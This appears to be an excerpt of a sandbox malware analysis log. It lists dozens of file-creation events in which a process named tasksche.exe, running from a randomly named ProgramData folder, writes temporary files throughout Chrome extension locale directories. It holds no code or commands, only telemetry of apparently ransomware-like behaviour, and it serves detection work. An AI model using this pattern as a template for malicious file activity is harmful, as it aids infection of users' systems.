Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf\0.0.0.19_0\_locales\ja\~SD96A1.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf\0.0.0.19_0\_locales\ko\~SD96A2.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf\0.0.0.19_0\_locales\lt\~SD96A3.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf\0.0.0.19_0\_locales\lv\~SD96A4.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf\0.0.0.19_0\_locales\nl\~SD96A5.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf\0.0.0.19_0\_locales\no\~SD96A6.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf\0.0.0.19_0\_locales\pl\~SD96B6.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf\0.0.0.19_0\_locales\pt_BR\~SD96B7.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf\0.0.0.19_0\_locales\pt_PT\~SD96B8.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf\0.0.0.19_0\_locales\ro\~SD96B9.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf\0.0.0.19_0\_locales\ru\~SD96BA.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf\0.0.0.19_0\_locales\sk\~SD96BB.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf\0.0.0.19_0\_locales\sl\~SD96BC.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf\0.0.0.19_0\_locales\sr\~SD96CD.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf\0.0.0.19_0\_locales\sv\~SD96ED.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf\0.0.0.19_0\_locales\th\~SD96FE.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf\0.0.0.19_0\_locales\tr\~SD96FF.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf\0.0.0.19_0\_locales\uk\~SD9700.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf\0.0.0.19_0\_locales\vi\~SD9701.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf\0.0.0.19_0\_locales\zh_CN\~SD9702.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf\0.0.0.19_0\_locales\zh_TW\~SD9712.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\~SD9713.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_0\~SD9714.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_0\_locales\~SD9715.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_0\_locales\af\~SD9716.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_0\_locales\am\~SD9727.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_0\_locales\ar\~SD9728.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_0\_locales\az\~SD9729.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_0\_locales\bg\~SD972A.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_0\_locales\bn\~SD972B.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_0\_locales\ca\~SD973C.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_0\_locales\cs\~SD973D.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_0\_locales\da\~SD973E.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_0\_locales\de\~SD973F.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_0\_locales\el\~SD974F.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_0\_locales\en_GB\~SD9750.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_0\_locales\en_US\~SD9751.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_0\_locales\es\~SD9752.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_0\_locales\es_419\~SD9763.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_0\_locales\et\~SD9764.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_0\_locales\eu\~SD9765.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_0\_locales\fa\~SD9766.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_0\_locales\fi\~SD9776.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_0\_locales\fil\~SD9777.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_0\_locales\fr\~SD9788.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_0\_locales\fr_CA\~SD9789.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_0\_locales\gl\~SD979A.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_0\_locales\gu\~SD979B.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_0\_locales\hi\~SD97AB.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_0\_locales\hr\~SD97AC.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_0\_locales\hu\~SD97AD.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_0\_locales\hy\~SD97AE.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_0\_locales\id\~SD97AF.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_0\_locales\is\~SD97C0.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_0\_locales\it\~SD97C1.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_0\_locales\iw\~SD97C2.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_0\_locales\ja\~SD97C3.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_0\_locales\ka\~SD97D4.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_0\_locales\km\~SD97D5.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_0\_locales\kn\~SD97D6.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_0\_locales\ko\~SD97D7.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_0\_locales\lo\~SD97E7.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_0\_locales\lt\~SD97E8.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_0\_locales\lv\~SD97E9.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_0\_locales\ml\~SD97EA.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_0\_locales\mn\~SD97FB.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_0\_locales\mr\~SD97FC.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_0\_locales\ms\~SD97FD.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_0\_locales\ne\~SD97FE.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_0\_locales\nl\~SD980E.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_0\_locales\no\~SD980F.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_0\_locales\pl\~SD9810.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_0\_locales\pt_BR\~SD9811.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_0\_locales\pt_PT\~SD9812.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_0\_locales\ro\~SD9842.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_0\_locales\ru\~SD9843.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_0\_locales\si\~SD9844.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_0\_locales\sk\~SD9845.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_0\_locales\sl\~SD9856.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_0\_locales\sr\~SD9857.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_0\_locales\sv\~SD9858.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_0\_locales\sw\~SD9859.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_0\_locales\ta\~SD985A.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_0\_locales\te\~SD985B.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_0\_locales\th\~SD986C.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_0\_locales\tr\~SD986D.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_0\_locales\uk\~SD986E.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_0\_locales\ur\~SD986F.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_0\_locales\vi\~SD987F.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_0\_locales\zh_CN\~SD9880.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_0\_locales\zh_HK\~SD9881.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_0\_locales\zh_TW\~SD9882.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_0\_locales\zu\~SD9893.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_0\_metadata\~SD9894.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\~SD9895.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.0_0\~SD9896.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.0_0\css\~SD9897.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.0_0\html\~SD98A7.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.0_0\images\~SD98A8.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.0_0\_locales\~SD98A9.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.0_0\_locales\bg\~SD98AA.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.0_0\_locales\ca\~SD98BB.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.0_0\_locales\cs\~SD98BC.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.0_0\_locales\da\~SD98BD.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.0_0\_locales\de\~SD98BE.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.0_0\_locales\el\~SD98BF.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.0_0\_locales\en\~SD98D0.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.0_0\_locales\en_GB\~SD98D1.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.0_0\_locales\es\~SD98D2.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.0_0\_locales\es_419\~SD98D3.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.0_0\_locales\et\~SD98D4.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.0_0\_locales\fi\~SD98D5.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.0_0\_locales\fil\~SD98D6.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.0_0\_locales\fr\~SD98E6.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.0_0\_locales\hi\~SD98E7.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.0_0\_locales\hr\~SD98E8.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.0_0\_locales\hu\~SD98E9.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.0_0\_locales\id\~SD98EA.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.0_0\_locales\it\~SD98EB.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.0_0\_locales\ja\~SD98FC.tmp
